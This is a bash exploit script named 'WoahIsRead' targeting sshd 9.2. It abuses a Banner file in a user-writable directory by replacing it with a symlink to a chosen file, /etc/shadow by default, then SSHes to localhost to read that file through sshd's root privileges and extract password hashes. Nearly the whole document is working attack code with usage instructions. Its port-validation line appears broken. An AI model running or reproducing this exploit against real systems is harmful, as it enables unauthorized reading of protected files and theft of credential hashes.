#!/bin/bash # By: oxagast # # woahisread # this exploit depends on "Banner" being pointed at a file that # exists in a dir writeable by the user running the exploit, and # that the file can be removed/moved by that user. Basically the # banner file should be checked for proper permissions, as being # owned by root and writeable only by root, and sshd fails to do # this. This allows you to create a symlink, and read the file # it points to as the user running the openssh process which is # normally, root. useage() { echo "Usage:" echo " $0 -p 22 -s -f /etc/shadow" 1>&2 } echo "[*] WoahIsRead sshd 9.2 banner symbolic link exploit" while getopts ":s:p:f:" o; do case "${o}" in p) p=${OPTARG} ((p == 1 || p == 65535)) || useage ;; s) s=${OPTARG} ;; f) f=${OPTARG} ;; ?) useage ;; esac done shift $((OPTIND - 1)) if [[ ! $f ]]; then f="/etc/shadow" fi if [[ ! $p ]]; then p="22" fi if [[ ! $s ]]; then s="" fi BPATH=$(grep -i "^Banner " /etc/ssh/sshd_config | cut -d ' ' -f 2) VER=$(sshd -V 2>&1 | cut -d ',' -f 1) OWN=$(stat -c "%U" $f) echo "[*] SSHD Version: $VER" echo "[*] SSHD Banner path is: $BPATH" echo "[*] SSHD Banner owner is: $OWN" if [[ $BPATH == "none" ]]; then echo "[x] SSHD Banner must be set to a user owned file" exit 1 fi if test -e $BPATH; then mv $BPATH $BPATH.bak ln -s $f $BPATH MOV=1 else ln -s $f $BPATH fi echo "[*] SSHing to ourselves... $s:$p" ssh -o BatchMode=true $s -p $p 2>&1 | tee /tmp/sshexp.1 >/dev/null head -n -1 /tmp/sshexp.1 >out if [[ $f == "/etc/shadow" ]]; then if [[ $(head -n 1 out | grep root) ]]; then grep ':\$.\$' out echo "[!] Exploit complete, cleaning up..." if [[ $MOV -eq 1 ]]; then mv $BPATH.bak $BPATH fi exit 0 else echo "[x] Sorry, exploit failed." exit 1 fi else cat out exit 0 fi